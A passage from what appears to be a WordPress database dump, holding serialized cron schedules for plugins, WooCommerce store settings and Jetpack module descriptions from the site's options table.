}i:1632358885;a:1:{s:21:\"ai1wm_storage_cleanup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632358900;a:1:{s:15:\"itsec_cron_test\";a:1:{s:32:\"107d9a7f15c739dd35fd9eff619e9532\";a:2:{s:8:\"schedule\";b:0;s:4:\"args\";a:1:{i:0;i:1632358900;}}}}i:1632359149;a:1:{s:28:\"wp_statistics_add_visit_hook\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632359402;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"7a0fd5d064c59cf40c3df9ad0bb6e63d\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:11:\"clear-locks\";}s:8:\"interval\";i:86400;}}}i:1632359462;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"d3ad27d223d301b6ae68ed2a88d04d71\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:12:\"health-check\";}s:8:\"interval\";i:86400;}}}i:1632359642;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"3ec3d6914daf50bcdb5e5b065213e29b\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:17:\"purge-log-entries\";}s:8:\"interval\";i:86400;}}}i:1632360182;a:1:{s:10:\"itsec_cron\";a:1:{s:32:\"c0ae31dfe60fdb9da055aa838519db0f\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:1:{i:0;s:12:\"clear-tokens\";}s:8:\"interval\";i:86400;}}}i:1632368700;a:1:{s:19:\"icwp-wpsf-all-scans\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:19:\"icwp-wpsf-per-day-1\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632371301;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1632376874;a:1:{s:30:\"um_twicedaily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1632377714;a:1:{s:17:\"gravityforms_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632383340;a:1:{s:15:\"icwp-wpsf-daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632384009;a:1:{s:31:\"wpseo_permalink_structure_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632384010;a:1:{s:13:\"wpseo-reindex\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632395727;a:1:{s:19:\"wpseo-reindex-links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632413294;a:1:{s:16:\"itsec_purge_logs\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632414503;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632418334;a:1:{s:24:\"akismet_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632419415;a:1:{s:32:\"recovery_mode_clean_expired_keys\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632420074;a:1:{s:25:\"um_daily_scheduled_events\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632425093;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1632678616;a:1:{s:30:\"wp_site_health_scheduled_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1632686896;a:1:{s:26:\"nf_weekly_promotion_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"nf-weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1632687119;a:1:{s:22:\"nf_marketing_feed_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"nf-weekly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:604800;}}}i:1633849578;a:1:{s:13:\"nf_optin_cron\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"nf-monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2678400;}}}i:1634449826;a:2:{s:14:\"updraft_backup\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}s:23:\"updraft_backup_database\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:7:\"monthly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:2592000;}}}s:7:\"version\";i:2;}','yes'),(429244,'ai1wm_auth_user','admin','yes'),(429245,'ai1wm_auth_password','admin','yes'),(397384,'icwp_wpsf_install_id','81272299716d913e2efafd547b5e992b4061eece','yes'),(131303,'nf_form_tel_sent','true','no'),(297,'woocommerce_default_country','US:MD','yes'),(298,'woocommerce_allowed_countries','specific','yes'),(299,'woocommerce_all_except_countries','a:0:{}','yes'),(300,'woocommerce_specific_allowed_countries','a:0:{}','yes'),(301,'woocommerce_ship_to_countries','disabled','yes'),(302,'woocommerce_specific_ship_to_countries','a:0:{}','yes'),(303,'woocommerce_default_customer_address','geolocation','yes'),(304,'woocommerce_calc_taxes','no','yes'),(305,'woocommerce_demo_store','no','yes'),(306,'woocommerce_demo_store_notice','This is a demo store for testing purposes &mdash; no orders shall be fulfilled.','no'),(307,'woocommerce_currency','USD','yes'),(308,'woocommerce_currency_pos','left','yes'),(309,'woocommerce_price_thousand_sep',',','yes'),(310,'woocommerce_price_decimal_sep','.','yes'),(311,'woocommerce_price_num_decimals','2','yes'),(312,'woocommerce_weight_unit','lbs','yes'),(313,'woocommerce_dimension_unit','in','yes'),(314,'woocommerce_enable_review_rating','yes','yes'),(315,'woocommerce_review_rating_required','yes','no'),(316,'woocommerce_review_rating_verification_label','yes','no'),(317,'woocommerce_review_rating_verification_required','no','no'),(318,'woocommerce_shop_page_id','535','yes'),(319,'woocommerce_shop_page_display','','yes'),(320,'woocommerce_category_archive_display','','yes'),(321,'woocommerce_default_catalog_orderby','menu_order','yes'),(322,'woocommerce_cart_redirect_after_add','no','yes'),(323,'woocommerce_enable_ajax_add_to_cart','yes','yes'),(324,'shop_catalog_image_size','a:3:{s:5:\"width\";s:3:\"300\";s:6:\"height\";s:3:\"300\";s:4:\"crop\";i:1;}','yes'),(325,'shop_single_image_size','a:3:{s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:4:\"crop\";i:1;}','yes'),(326,'shop_thumbnail_image_size','a:3:{s:5:\"width\";s:3:\"180\";s:6:\"height\";s:3:\"180\";s:4:\"crop\";i:1;}','yes'),(327,'woocommerce_enable_lightbox','yes','yes'),(328,'woocommerce_manage_stock','yes','yes'),(329,'woocommerce_hold_stock_minutes','60','no'),(330,'woocommerce_notify_low_stock','yes','no'),(331,'woocommerce_notify_no_stock','yes','no'),(332,'woocommerce_stock_email_recipient','pr@zphiblgz.org','no'),(333,'woocommerce_notify_low_stock_amount','2','no'),(334,'woocommerce_notify_no_stock_amount','0','yes'),(335,'woocommerce_hide_out_of_stock_items','no','yes'),(336,'woocommerce_stock_format','','yes'),(337,'woocommerce_file_download_method','force','no'),(338,'woocommerce_downloads_require_login','no','no'),(339,'woocommerce_downloads_grant_access_after_payment','yes','no'),(340,'woocommerce_prices_include_tax','no','yes'),(341,'woocommerce_tax_based_on','shipping','yes'),(342,'woocommerce_shipping_tax_class','','yes'),(343,'woocommerce_tax_round_at_subtotal','no','yes'),(344,'woocommerce_tax_classes','Reduced Rate\nZero Rate','yes'),(345,'woocommerce_tax_display_shop','excl','yes'),(346,'woocommerce_tax_display_cart','excl','no'),(347,'woocommerce_price_display_suffix','','yes'),(348,'woocommerce_tax_total_display','itemized','no'),(349,'woocommerce_enable_shipping_calc','yes','no'),(350,'woocommerce_shipping_cost_requires_address','no','no'),(351,'woocommerce_ship_to_destination','billing','no'),(352,'woocommerce_enable_coupons','no','yes'),(353,'woocommerce_calc_discounts_sequentially','no','no'),(354,'woocommerce_enable_guest_checkout','yes','no'),(355,'woocommerce_force_ssl_checkout','no','yes'),(356,'woocommerce_unforce_ssl_checkout','no','yes'),(357,'woocommerce_cart_page_id','103','yes'),(358,'woocommerce_checkout_page_id','104','yes'),(359,'woocommerce_terms_page_id','','no'),(360,'woocommerce_checkout_pay_endpoint','order-pay','yes'),(361,'woocommerce_checkout_order_received_endpoint','order-received','yes'),(362,'woocommerce_myaccount_add_payment_method_endpoint','add-payment-method','yes'),(2550,'widget_form_maker_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2551,'cfm_emailverification','1','yes'),(514,'woocommerce_new_order_settings','a:5:{s:7:\"enabled\";s:3:\"yes\";s:9:\"recipient\";s:19:\"paypal@zphiblgz.org\";s:7:\"subject\";s:65:\"[{site_title}] New customer order ({order_number}) - {order_date}\";s:7:\"heading\";s:18:\"New customer order\";s:10:\"email_type\";s:4:\"html\";}','yes'),(233,'jetpack_file_data','a:1:{s:5:\"4.4.1\";a:50:{s:32:\"31e5b9ae08b62c2b0cd8a7792242298b\";a:14:{s:4:\"name\";s:20:\"Spelling and Grammar\";s:11:\"description\";s:40:\"Check your spelling, style, and grammar.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"6\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:115:\"after the deadline, afterthedeadline, spell, spellchecker, spelling, grammar, proofreading, style, language, cliche\";}s:32:\"3f41b2d629265b5de8108b463abbe8e2\";a:14:{s:4:\"name\";s:8:\"Carousel\";s:11:\"description\";s:64:\"Transform image galleries into gorgeous, full-screen slideshows.\";s:14:\"jumpstart_desc\";s:79:\"Brings your photos and images to life as full-size, easily navigable galleries.\";s:4:\"sort\";s:2:\"22\";s:20:\"recommendation_order\";s:2:\"12\";s:10:\"introduced\";s:3:\"1.5\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:17:\"Photos and Videos\";s:7:\"feature\";s:21:\"Appearance, Jumpstart\";s:25:\"additional_search_queries\";s:80:\"gallery, carousel, diaporama, slideshow, images, lightbox, exif, metadata, image\";}s:32:\"c6ebb418dde302de09600a6025370583\";a:14:{s:4:\"name\";s:8:\"Comments\";s:11:\"description\";s:65:\"Allow comments with WordPress.com, Twitter, Facebook, or Google+.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"20\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:53:\"comments, comment, facebook, twitter, google+, social\";}s:32:\"836f9485669e1bbb02920cb474730df0\";a:14:{s:4:\"name\";s:12:\"Contact Form\";s:11:\"description\";s:57:\"Insert a customizable contact form anywhere on your site.\";s:14:\"jumpstart_desc\";s:111:\"Adds a button to your post and page editors, allowing you to build simple forms to help visitors stay in touch.\";s:4:\"sort\";s:2:\"15\";s:20:\"recommendation_order\";s:2:\"14\";s:10:\"introduced\";s:3:\"1.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:18:\"Writing, Jumpstart\";s:25:\"additional_search_queries\";s:44:\"contact, form, grunion, feedback, submission\";}s:32:\"ea3970eebf8aac55fc3eca5dca0e0157\";a:14:{s:4:\"name\";s:20:\"Custom Content Types\";s:11:\"description\";s:61:\"Organize and display different types of content on your site.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"34\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"3.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:72:\"cpt, custom post types, portfolio, portfolios, testimonial, testimonials\";}s:32:\"d2bb05ccad3d8789df40ca3abb97336c\";a:14:{s:4:\"name\";s:10:\"Custom CSS\";s:11:\"description\";s:53:\"Tweak your site’s CSS without modifying your theme.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"2\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.7\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:108:\"css, customize, custom, style, editor, less, sass, preprocessor, font, mobile, appearance, theme, stylesheet\";}s:32:\"a2064eec5b9c7e0d816af71dee7a715f\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"53a4ec755022ef3953699734c343da02\";a:14:{s:4:\"name\";s:21:\"Enhanced Distribution\";s:11:\"description\";s:27:\"Increase reach and traffic.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:1:\"5\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:54:\"google, seo, firehose, search, broadcast, broadcasting\";}s:32:\"72fecb67ee6704ba0a33e0225316ad06\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"d56e2886185a9eace719cc57d46770df\";a:14:{s:4:\"name\";s:19:\"Gravatar Hovercards\";s:11:\"description\";s:58:\"Enable pop-up business cards over commenters’ Gravatars.\";s:14:\"jumpstart_desc\";s:131:\"Let commenters link their profiles to their Gravatar accounts, making it easy for your visitors to learn more about your community.\";s:4:\"sort\";s:2:\"11\";s:20:\"recommendation_order\";s:2:\"13\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:18:\"Social, Appearance\";s:7:\"feature\";s:21:\"Appearance, Jumpstart\";s:25:\"additional_search_queries\";s:20:\"gravatar, hovercards\";}s:32:\"e391e760617bd0e0736550e34a73d7fe\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:8:\"2.0.3 ??\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"2e345370766346c616b3c5046e817720\";a:14:{s:4:\"name\";s:15:\"Infinite Scroll\";s:11:\"description\";s:54:\"Automatically load new content when a visitor scrolls.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"26\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.0\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:10:\"Appearance\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:33:\"scroll, infinite, infinite scroll\";}s:32:\"bd69edbf134de5fae8fdcf2e70a45b56\";a:14:{s:4:\"name\";s:8:\"JSON API\";s:11:\"description\";s:51:\"Allow applications to securely access your content.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"19\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:6:\"Public\";s:11:\"module_tags\";s:19:\"Writing, Developers\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:50:\"api, rest, develop, developers, json, klout, oauth\";}s:32:\"8110b7a4423aaa619dfa46b8843e10d1\";a:14:{s:4:\"name\";s:14:\"Beautiful Math\";s:11:\"description\";s:57:\"Use LaTeX markup for complex equations and other geekery.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"12\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.1\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:47:\"latex, math, equation, equations, formula, code\";}s:32:\"fd7e85d3b4887fa6b6f997d6592c1f33\";a:14:{s:4:\"name\";s:5:\"Likes\";s:11:\"description\";s:63:\"Give visitors an easy way to show they appreciate your content.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"23\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.2\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:6:\"Social\";s:7:\"feature\";s:10:\"Engagement\";s:25:\"additional_search_queries\";s:26:\"like, likes, wordpress.com\";}s:32:\"c5dfef41fad5bcdcaae8e315e5cfc420\";a:14:{s:4:\"name\";s:6:\"Manage\";s:11:\"description\";s:54:\"Manage all of your sites from a centralized dashboard.\";s:14:\"jumpstart_desc\";s:151:\"Helps you remotely manage plugins, turn on automated updates, and more from <a href=\"https://wordpress.com/plugins/\" target=\"_blank\">wordpress.com</a>.\";s:4:\"sort\";s:1:\"1\";s:20:\"recommendation_order\";s:1:\"3\";s:10:\"introduced\";s:3:\"3.4\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:35:\"Centralized Management, Recommended\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:26:\"manage, management, remote\";}s:32:\"fd6dc399b92bce76013427e3107c314f\";a:14:{s:4:\"name\";s:8:\"Markdown\";s:11:\"description\";s:51:\"Write posts or pages in plain-text Markdown syntax.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"31\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:7:\"Writing\";s:7:\"feature\";s:7:\"Writing\";s:25:\"additional_search_queries\";s:12:\"md, markdown\";}s:32:\"c49a35b6482b0426cb07ad28ecf5d7df\";a:14:{s:4:\"name\";s:12:\"Mobile Theme\";s:11:\"description\";s:47:\"Optimize your site for smartphones and tablets.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"21\";s:20:\"recommendation_order\";s:2:\"11\";s:10:\"introduced\";s:3:\"1.8\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:31:\"Appearance, Mobile, Recommended\";s:7:\"feature\";s:10:\"Appearance\";s:25:\"additional_search_queries\";s:24:\"mobile, theme, minileven\";}s:32:\"b42e38f6fafd2e4104ebe5bf39b4be47\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"771cfeeba0d3d23ec344d5e781fb0ae2\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"54f0661d27c814fc8bde39580181d939\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"46c4c413b5c72bbd3c3dbd14ff8f8adc\";a:14:{s:4:\"name\";s:0:\"\";s:11:\"description\";s:0:\"\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:0:\"\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:0:\"\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:0:\"\";s:13:\"auto_activate\";s:0:\"\";s:11:\"module_tags\";s:0:\"\";s:7:\"feature\";s:0:\"\";s:25:\"additional_search_queries\";s:0:\"\";}s:32:\"9ea52fa25783e5ceeb6bfaed3268e64e\";a:14:{s:4:\"name\";s:7:\"Monitor\";s:11:\"description\";s:61:\"Receive immediate notifications if your site goes down, 24/7.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"28\";s:20:\"recommendation_order\";s:2:\"10\";s:10:\"introduced\";s:3:\"2.6\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:2:\"No\";s:11:\"module_tags\";s:11:\"Recommended\";s:7:\"feature\";s:8:\"Security\";s:25:\"additional_search_queries\";s:37:\"monitor, uptime, downtime, monitoring\";}s:32:\"cfcaafd0fcad087899d715e0b877474d\";a:14:{s:4:\"name\";s:13:\"Notifications\";s:11:\"description\";s:57:\"Receive instant notifications of site comments and likes.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"13\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"1.9\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:3:\"Yes\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:5:\"Other\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:62:\"notification, notifications, toolbar, adminbar, push, comments\";}s:32:\"0d18bfa69bec61550c1d813ce64149b0\";a:14:{s:4:\"name\";s:10:\"Omnisearch\";s:11:\"description\";s:66:\"Search your entire database from a single field in your dashboard.\";s:14:\"jumpstart_desc\";s:0:\"\";s:4:\"sort\";s:2:\"16\";s:20:\"recommendation_order\";s:0:\"\";s:10:\"introduced\";s:3:\"2.3\";s:7:\"changed\";s:0:\"\";s:10:\"deactivate\";s:0:\"\";s:4:\"free\";s:0:\"\";s:19:\"requires_connection\";s:2:\"No\";s:13:\"auto_activate\";s:3:\"Yes\";s:11:\"module_tags\";s:10:\"Developers\";s:7:\"feature\";s:7:\"General\";s:25:\"additional_search_queries\";s:6:\"search\";}s:32:\"3f0a11e23118f0788d424b646a6d465f\";a:14:{s:4:\"name\";s:6:\"Photon\";s:11:\"description\";s:27:\"Speed up images and photos.\";s:14:\"jumpstart_desc\";s:141:\"Mirrors and serves your images from our free and fast image CDN, improving your site’s performance with no additional load on your 